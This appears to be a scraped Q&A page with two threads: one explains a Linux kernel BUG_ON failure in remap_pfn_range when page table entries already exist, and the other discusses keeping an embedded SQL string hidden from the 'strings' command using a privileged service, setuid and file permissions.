Therefore !pte_none returns 0 when the corresponding page table entry does not exist and 1 other wise as the condition passed into BUG_ON.

If the page table entry already exists then the call to BUG macro occurs.

What happens if you specify a lower a amount of memory than !GB that is greater than 300MB , say 500MB or 800MB ?

So either your starting address is greater than your ending address, or you CONFIG_TRANSPARENT_HUGEPAGE isn't configured in the kernel or you are referring to Page Metadata doesn't exist or Page Table entries that already exist.

Clarifying from the comments, your call to remap_pfn_range references Page Table Entry pointers or *ptethat are already pointing to a page table entry or pte.

This means that set_pte_at(mm, addr, pte, pte_mkspecial(pfn_pte(pfn, prot))); would fail as the pte pointer already points to a page table entry and hence can't be set to the pte that is pte_mkspecial(pfn_pte(pfn, prot)).

Bypassing the 1G /3G virtual address split

See the following article High Memory In The Linux Kernel

See the following mailing list post, which discusses some additional information about HIGHMEM with a minimum of 1GB of RAM.

Information on mapping kernel and non kernel virtual address space to user land

One way to map kernel virtual addresses and non kernel (returned by vmalloc()) virtual addresses to userspace is using remap_pfn_range. See Linux Memory Mapping for additional information.

Another way that replaced the usage of the nopage handler on older kernels is the vm_insert_page function

Additional Resources include:

How to prevent user from reading strings stored in stack?

6 votes

Here's a minimal test case:

#include <stdio.h>
#include <stdlib.h>

int main ( int argc , char **argv )
{
        const char abc [15] = "abcdefg\0";
        printf ("%s\n" , abc);
        return 0;
}

And you do strings test , you should see abcdefg , as it's stored in read only area.

So , what's the best way to prevent user from reading this string , with "strings" command , e.g I don't want users to know my SQL phrase

One solution would be to write an additional program that runs as another user, and read credentials from a location where it is not accessible by users you want to protect credentials from. This program would expose an API (through TCP/IP or any message passing interface or remote procedure call) that do not need to connect to the database directly, but responds only to requests you're interested in.

Another approach is to set the setuid bit on your program, and read credentials from a location where users have no read access. Give the program an owner that is allowed to read the file containing the query, using chown. When executed, your program will obtain privileges to read the file.

Like said in Nawaz answer (and Binyamin Sharet), you could use obfuscation techniques to make it harder to read the query (in particular, it would not work with strings anymore), but keep in mind that someone with more knowledge will be able to find the string using a deassembler or a debugger, or simply by running your program in strace. It makes this approach unsuitable to store sensitive information, like connection credentials: as long as a binary can connect, it contains credential, anyone with some knowledge in computer security know that and may revert engineer your program to retrieve your password.

As a general guideline, if you need to protect information from a user executing your program, never giving this information to the program is the only way to make sure it can't be read.